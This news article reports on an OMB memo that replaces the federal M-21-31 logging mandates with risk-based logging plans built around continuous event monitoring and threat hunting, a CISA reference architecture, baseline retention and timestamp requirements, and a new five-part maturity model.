Federal agencies are being urged to adopt a more risk-driven strategy when recording cybersecurity data. Under updated guidance, agency chief information security officers must now submit revised logging plans to the Cybersecurity and Infrastructure Security Agency (CISA) and the Office of Management and Budget (OMB), with emphasis on two key areas: continuous event monitoring (CEM) and threat hunting, investigation, response, and forensics (THIRF).
The updated directive, issued by OMB Director Russ Vought, overturns prior logging mandates and introduces streamlined expectations designed to reduce bureaucratic overhead and control costs.
“In 2021, OMB released Memorandum M-21-31—aimed at strengthening the federal government’s ability to investigate and remediate cybersecurity incidents by raising logging baselines and improving visibility into system events. That effort successfully built foundational capabilities across agencies,” Vought noted in the new memo, released Friday. “Yet certain requirements—like retaining massive volumes of log data without demonstrating clear operational value—proved impractical and too costly for most organizations. To address these shortcomings and adapt to the changing cyber threat landscape, this memo instructs agencies to prioritize logging based on actual risk.”
OMB initially mandated enhanced cyber event logging for agency CISOs following the SolarWinds breach, emphasizing that real-time visibility—especially through cloud environments and third-party providers—is critical for detecting, investigating, and resolving cyber threats.
However, as logging volumes grew, so did the expense and complexity. Agencies found they increasingly needed sophisticated tools powered by artificial intelligence and machine learning to parse and act on the data effectively.
A Government Accountability Office (GAO) report from December 2023 revealed that 20 out of 23 agencies failed to meet the August 2023 deadline for reaching maturity level 3 under the previous framework.
“Until agencies fully implement event logging requirements, the federal government’s capacity to detect, investigate, and remediate cyber threats remains limited,” GAO warned. “Agencies cited three major obstacles: insufficient staff, technical hurdles in event logging, and gaps in sharing cyber threat intelligence.”
The revised strategy begins with CISA developing a Logging Reference Architecture (LRA) within the next 90 days. This framework will guide agencies in achieving CEM and THIRF goals and serve as the primary resource for implementing effective logging practices.
Following the LRA’s release, agencies will have 90 days to finalize and submit their updated logging plans.
“These plans must outline the concrete steps needed to establish and sustain effective CEM and THIRF capabilities. They should detail actions required to meet the baseline standards set in this memo—as well as any additional logging activities aligned with CEM and THIRF objectives—while accounting for the agency’s specific threat environment, risk profile, and mission needs, as outlined in the CISA.Logging Reference Architecture,” the memo specifies.
Core baseline requirements include retaining logs in a searchable format for at least six months, ensuring timestamps are synchronized via the Network Time Protocol (NTP), and making logs immediately accessible to the agency’s top-tier security operations center (SOC).
OMB describes CEM as the real-time surveillance of network activity, enabling the rapid detection of anomalies and prompt response—typically managed by the SOC.
THIRF logs support post-incident forensic analysis and investigation after a known or suspected breach. Their purpose is to contain, remediate, and recover from adversary actions. To support THIRF, agencies must maintain both hot (immediately accessible) and cold (archival) storage, along with the ability to retrieve and correlate logs from diverse sources to reconstruct attack patterns.
“Every agency must apply these objectives to all systems it operates or that are operated on its behalf by third parties—including Internet of Things (IoT) and operational technology (OT) devices that are part of or constitute such systems,” the memo states.
As part of this risk-focused shift, OMB has also introduced an updated maturity model to track agency progress.
“This model defines performance benchmarks reflecting increasing levels of capability across several domains: system inventory visibility, log management planning, log collection and retention. Agencies will assess and report progress based on the percentage of systems meeting each maturity tier,” the memo explains.
The maturity model includes five components, each with four distinct levels of maturity:
- Inventory visibility
- Collection coverage
- Collection operations
- Data retention
- Log management
OMB has established staggered deadlines—120, 180, and 320 days—for agencies to achieve the first maturity level across each category.
In cases where a cyber compromise is detected or suspected, agencies must continue sharing logs and related data with both CISA and the FBI.
“Agencies should deliver this data in formats and through methods mutually agreed upon with CISA or the FBI. Whenever feasible, access to logs should be provided within the timeframes requested,” the memo instructs. “If accessing agency data involves statutory, regulatory, or judicial constraints, CISA and FBI leadership will follow required procedures or collaborate with the agency to establish lawful accommodations when available.”
In recent years, OMB and CISA have worked to simplify and reduce the cost of logging. In 2024, CISA partnered with Microsoft to pilot an advanced, no-cost logging solution with select agencies before expanding it government-wide.
That same year, CISA published the “Expanded Cloud Log Implementation Playbook”—developed with Microsoft—offering detailed guidance on newly available log types and how they can be leveraged for threat hunting and incident response.
Copyright
© 2026 Federal News Network. All rights reserved. This website is not intended for users located within the European Economic Area.
